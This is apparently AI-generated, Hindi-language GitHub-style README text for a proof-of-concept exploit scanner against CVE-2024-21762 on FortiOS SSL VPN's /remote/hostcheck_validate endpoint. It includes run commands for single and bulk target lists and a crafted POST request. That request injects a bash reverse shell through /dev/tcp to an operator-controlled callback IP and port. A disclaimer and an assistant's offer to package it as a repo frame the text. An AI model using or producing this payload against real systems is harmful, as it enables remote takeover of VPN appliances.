
प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर जो FortiOS SSL VPN के /remote/hostcheck_validate एंडपॉइंट में CVE-2024-21762 को लक्षित करता है, रिवर्स शेल पेलोड डिलीवरी के साथ।
FortiOS SSL VPN के /remote/hostcheck_validate एंडपॉइंट पर CVE-2024-21762 को लक्षित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर जिसमें रिवर्स शेल पेलोड डिलीवरी शामिल है।
यहाँ आपके प्रोजेक्ट के लिए एक GitHub-शैली का राइटअप है, जिसमें एक साफ और संक्षिप्त सारांश, उपयोग मार्गदर्शिका और CVE के साथ इसके फिट होने का संदर्भ शामिल है।
CVE-2024-21762 FortiOS HostCheck PoC ScannerCVE-2024-21762 को लक्षित करने वाला प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर, FortiOS SSL VPN के
/remote/hostcheck_validateएंडपॉइंट पर रिवर्स शेल पेलोड डिलीवरी के साथ।
यह Python स्क्रिप्ट एक PoC (प्रूफ ऑफ कॉन्सेप्ट) टूल है जिसे Fortinet के FortiOS SSL VPN इंटरफ़ेस के साथ इंटरैक्ट करने के लिए डिज़ाइन किया गया है, जो CVE-2024-21762 को लक्षित करता है — /remote/hostcheck_validate एंडपॉइंट में एक स्टैक-आधारित बफर ओवरफ़्लो या कमांड इंजेक्शन भेद्यता।
अस्वीकरण: यह केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
/remote/hostcheck_validate पर एक तैयार POST अनुरोध भेजता है।host) में एक bash रिवर्स शेल पेलोड इंजेक्ट करता है।User-Agent, Cookie) का उपयोग करता है।last_response.txt)tqdmनिर्भरताएँ स्थापित करें:
pip install tqdm
python3 exploit.py --target 192.168.1.1:443 --callback-ip YOUR_IP --callback-port 8080
python3 exploit.py --input targets.txt --output results.txt --callback-ip YOUR_IP --callback-port 8080
targets.txt: प्रति पंक्ति IP:PORT प्रारूप में लक्ष्यों की सूचीresults.txt: शोषण प्रयासों का आउटपुट लॉगPOST /remote/hostcheck_validate HTTP/1.1
Host: [target]
User-Agent: FortiSSLVPNClient/6.4.0
Cookie: SVPNCOOKIE=AAAA
Content-Type: application/x-www-form-urlencoded
host=bash -c 'bash -i >& /dev/tcp/[callback-ip]/[callback-port] 0>&1'&...
यह टूल प्रत्येक प्रयास की पूर्ण HTTP प्रतिक्रिया को यहाँ लिखता है:
last_response.txt
इसका उपयोग यह सत्यापित करने के लिए करें कि अनुरोध पार्स किया गया, अस्वीकार किया गया या कोई त्रुटि कोड लौटाया गया।
यह कोड केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग उन नेटवर्कों या सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति नहीं है।
Carter — साइबर सुरक्षा इंजीनियर, Red/Purple Team उत्साही, PoC ऑटोमेशन नर्ड।
क्या आप चाहते हैं कि इसे README.md फ़ाइल + रेपो संरचना में पैकेज करके GitHub पर पुश करने के लिए तैयार किया जाए? मैं वह अगला उत्पन्न कर सकता हूँ।